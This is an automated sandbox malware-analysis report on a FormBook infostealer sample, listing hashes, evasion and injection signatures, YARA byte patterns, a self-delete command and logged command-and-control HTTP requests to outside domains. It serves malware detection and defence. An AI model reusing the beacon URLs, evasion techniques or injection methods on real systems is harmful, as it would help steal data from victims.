Play interactive tour

Edit tour

Analysis Report emthree.exe

Overview

General Information

Sample Name:	emthree.exe
Analysis ID:	323574
MD5:	25b5788669a3a8f35596ce975f0823a7
SHA1:	77e07883f131f342e3d24954ea348d25554440a1
SHA256:	f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
Tags:	PEP
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Binary contains a suspicious time stamp

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

emthree.exe (PID: 4600 cmdline: 'C:\Users\user\Desktop\emthree.exe' MD5: 25B5788669A3A8F35596CE975F0823A7)

emthree.exe (PID: 5772 cmdline: {path} MD5: 25B5788669A3A8F35596CE975F0823A7)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\emthree.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xfbeb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xfc132:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1286d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x128952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x107c55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x134475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x107741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x133f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x107d57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x107ecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1346ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xfcb4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1069bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1331dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xfd843:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x12a063:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x10dad7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x13a2f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x10eada:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x10a9f9:$sqlite3step: 68 34 1C 7B E1 0x10ab0c:$sqlite3step: 68 34 1C 7B E1 0x137219:$sqlite3step: 68 34 1C 7B E1 0x13732c:$sqlite3step: 68 34 1C 7B E1 0x10aa28:$sqlite3text: 68 38 2A 90 C5 0x10ab4d:$sqlite3text: 68 38 2A 90 C5 0x137248:$sqlite3text: 68 38 2A 90 C5 0x13736d:$sqlite3text: 68 38 2A 90 C5 0x10aa3b:$sqlite3blob: 68 53 D8 7F 8C 0x10ab63:$sqlite3blob: 68 53 D8 7F 8C 0x13725b:$sqlite3blob: 68 53 D8 7F 8C 0x137383:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: emthree.exe PID: 4600	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.emthree.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.emthree.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.emthree.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17629:$sqlite3step: 68 34 1C 7B E1 0x1773c:$sqlite3step: 68 34 1C 7B E1 0x17658:$sqlite3text: 68 38 2A 90 C5 0x1777d:$sqlite3text: 68 38 2A 90 C5 0x1766b:$sqlite3blob: 68 53 D8 7F 8C 0x17793:$sqlite3blob: 68 53 D8 7F 8C
1.2.emthree.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.emthree.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.emthree.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18429:$sqlite3step: 68 34 1C 7B E1 0x1853c:$sqlite3step: 68 34 1C 7B E1 0x18458:$sqlite3text: 68 38 2A 90 C5 0x1857d:$sqlite3text: 68 38 2A 90 C5 0x1846b:$sqlite3blob: 68 53 D8 7F 8C 0x18593:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: emthree.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: emthree.exe	Metadefender: Detection: 35%			Perma Link
Source: emthree.exe	ReversingLabs: Detection: 64%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: emthree.exe

Joe Sandbox ML: detected

Source: 1.2.emthree.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: global traffic	HTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1Host: www.porncamslivechat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1Host: www.amarilloautoexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS

Source: C:\Windows\explorer.exe

Code function: 2_2_06D527A2 getaddrinfo,setsockopt,recv,

2_2_06D527A2

Source: global traffic	HTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1Host: www.porncamslivechat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1Host: www.amarilloautoexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.asojebu.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Nov 2020 05:37:46 GMTServer: ApacheLink: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/Upgrade: h2,h2cConnection: Upgrade, closeReferrer-Policy: no-referrer-when-downgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77

Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comu
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
